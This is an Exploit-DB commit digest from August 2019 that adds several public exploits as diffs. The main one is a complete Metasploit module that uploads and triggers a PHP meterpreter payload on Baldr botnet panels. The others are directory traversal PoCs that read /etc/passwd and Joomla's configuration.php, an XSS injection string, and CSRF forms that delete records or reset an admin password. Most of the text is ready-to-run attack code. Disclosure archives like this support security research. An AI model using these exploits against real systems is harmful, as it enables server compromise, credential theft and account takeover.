DB: 2019-08-09

Offensive Security · Offensive Security · commit d82ffc9cd0e2 · 2019-08-09T05:02:23.000Z
7 changes to exploits/shellcodes

Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)
Aptana Jaxer 1.0.3.4547 - Local File inclusion
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download
Adive Framework 2.0.7 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
diff --git a/exploits/multiple/webapps/47214.txt b/exploits/multiple/webapps/47214.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Aptana Jaxer Remote Local File inclusion
+# Date: 8/8/2019
+# Exploit Author: Steph Jensen
+# Vendor Homepage:
+[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
+# Version: 1.0.3.4547
+# Tested on: Linux
+# CVE : CVE-2019-14312
+
+Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.
+
+To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.
+
+PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
diff --git a/exploits/php/remote/47215.rb b/exploits/php/remote/47215.rb
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
+      'Description'    => %q{
+        This module exploits the file upload vulnerability of baldr malware panel.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://prodaft.com']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP],
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr <= v2.0',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr v2.2',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ],
+          ['Baldr v3.0 & v3.1',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 19 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
+      ]
+    )
+  end
+
+  def check 
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/gate.php")
+    )
+
+    ver = ''
+
+    if res.code == 200
+      if res.body.include?('~;~')
+        targets[3] = targets[0]
+        #target = targets[3]
+        ver = '>= v3.0'
+      elsif res.body.include?(';')
+        #target = targets[2]
+        targets[2] = targets[0]
+        ver = 'v2.2'
+      elsif res.body.size < 4
+        targets[1] = targets[0]
+        #target = targets[1]
+        ver = '<= v2.0'
+      else
+        Exploit::CheckCode::Safe  
+      end
+      print_status("Baldr verison: #{ver}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    name = '.'+Rex::Text.rand_text_alpha(4)
+    files =
+    [
+      {data: payload.encoded, fname: "#{name}.php"}
+    ]
+    zip = Msf::Util::EXE.to_zip(files) 
+    hwid = Rex::Text.rand_text_alpha(8).upcase
+
+    if targets[0]
+      check
+    end
+
+
+    case target
+    when targets[3]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php")}
+      )
+      key = res.body.to_s.split('~;~')[0]
+      print_good("Key: #{key}")
+
+      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
+      data = xor(data,key)
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php"),
+        'data'  => data.to_s
+        }
+      )
+
+      if res.code == 200
+        print_good("Bot successfully registered.")
+      else
+        print_error("New bot register failed !")
+        return false
+      end
+
+      data = xor(zip.to_s,key)
+      form = Rex::MIME::Message.new
+      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")
+
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
+        'data'      => form.to_s
+      )
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+
+    when targets[2]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"/gate.php")}
+      )
+      key = res.body.to_s.split(';')[0]
+      print_good("Key: #{key}")
+      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
+      data << zip.to_s
+      
+      result = ""
+      codepoints = data.each_codepoint.to_a
+      codepoints.each_index do |i|
+          result += (codepoints[i] ^ key[i % key.size].ord).chr
+      end
+
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'data'      => result.to_s
+      )
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+    else
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php"),
+        'data'      => zip.to_s,
+        'encode_params' => true,
+        'vars_get'  => {
+          'hwid'  => hwid,
+          'os'  => 'Windows 7 x64',
+          'cookie'  => '0',
+          'pswd'  => '0',
+          'credit'  => '0',
+          'wallet'  => '0',
+          'file'  => '1',
+          'autofill'  => '0',
+          'version'  => 'v2.0'
+        }
+      )
+
+      if res && (res.code == 200 ||res.code == 100)
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}") if res
+        print_error("Failed to upload payload.")
+        return false
+      end
+    end
+
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3
+    )
+    
+    print_good("Payload successfully triggered !")
+  end
+
+  def xor(data, key)
+    result = ""
+    codepoints = data.each_codepoint.to_a
+    codepoints.each_index do |i|
+        result += (codepoints[i] ^ key[i % key.size].ord).chr
+    end
+    return result
+  end
+
+
+end
diff --git a/exploits/php/webapps/47212.txt b/exploits/php/webapps/47212.txt
@@ -0,0 +1,16 @@
+# Exploit Title: [title]
+# Date: [2019 08 06]
+# Exploit Author: [Greg.Priest]
+# Vendor Homepage: [https://open-school.org/]
+# Software Link: []
+# Version: [Open-School 3.0/Community Edition 2.3]
+# Tested on: [Windows/Linux ]
+# CVE : [CVE-2019-14696]
+
+
+Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.
+
+/index.php?r=students/guardians/create&id=1[inject JavaScript Code]
+
+Example:
+/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
diff --git a/exploits/php/webapps/47213.txt b/exploits/php/webapps/47213.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
+# Exploit Author: Mr Winst0n
+# Author E-mail: manamtabeshekan@gmail.com
+# Discovery Date: August 8, 2019
+# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
+# Tested Version: 1.0
+# Tested on: Parrot OS
+
+
+# PoC:
+
+<html>
+<body>
+	<form action="http://server/homeedit.php?delincome=778" method="post">
+		<input type="submit" value="Click!" />
+	</form>
+</body>
+</html>
diff --git a/exploits/php/webapps/47216.txt b/exploits/php/webapps/47216.txt
@@ -0,0 +1,51 @@
+#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
+#Dork: inurl:"index.php?option=com_jssupportticket"
+#Date: 08.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: http://joomsky.com/
+#Software Link: https://www.joomsky.com/46/download/1.html
+#Version: 1.1.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 1411 in file admin/models/ticket.php
+
+  1382	    function getDownloadAttachmentByName($file_name,$id){
+  1383	        if(empty($file_name)) return false;
+  1384	        if(!is_numeric($id)) return false;
+  1385	        $db = JFactory::getDbo();
+  1386	        $filename = str_replace(' ', '_',$file_name);
+  1387	        $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
+  1388	        $db->setQuery($query);
+  1389	        $foldername = $db->loadResult();
+  1390	
+  1391	        $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
+  1392	        $base = JPATH_BASE;
+  1393	        if(JFactory::getApplication()->isAdmin()){
+  1394	            $base = substr($base, 0, strlen($base) - 14); //remove administrator    
+  1395	        }  
+  1396	        $path = $base.'/'.$datadirectory;
+  1397	        $path = $path . '/attachmentdata';
+  1398	        $path = $path . '/ticket/' . $foldername;
+  1399	        $file = $path . '/' . $filename;
+  1400	
+  1401	        header('Content-Description: File Transfer');
+  1402	        header('Content-Type: application/octet-stream');
+  1403	        header('Content-Disposition: attachment; filename=' . basename($file));
+  1404	        header('Content-Transfer-Encoding: binary');
+  1405	        header('Expires: 0');
+  1406	        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+  1407	        header('Pragma: public');
+  1408	        header('Content-Length: ' . filesize($file));
+  1409	        //ob_clean();
+  1410	        flush();
+  1411	        readfile($file);		//!!!
+  1412	        exit();
+  1413	        exit;
+  1414	    }
+
+#####################################
+#PoC:
+#####################################
+$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"
diff --git a/exploits/php/webapps/47217.txt b/exploits/php/webapps/47217.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
+# Date:02/08/2019.
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://adive.es
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.7
+# Tested on: Windows and Kali linux
+# CVE :2019-14346
+
+# 1. Technical Description:
+# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
+#Request Forgery vulnerability, an attacker could change any user
+password.
+
+# 2. Proof Of Concept (CODE):
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/adive/admin/config" method="POST">
+      <input type="hidden" name="userName" value="admin" />
+      <input type="hidden" name="confPermissions" value="1" />
+      <input type="hidden" name="pass" value="1234" />
+      <input type="hidden" name="cpass" value="1234" />
+      <input type="hidden" name="invokeType" value="web" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+# 3. References:
+# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
+# https://imgur.com/apuZa9q
diff --git a/exploits/php/webapps/47218.txt b/exploits/php/webapps/47218.txt
diff --git a/files_exploits.csv b/files_exploits.csv
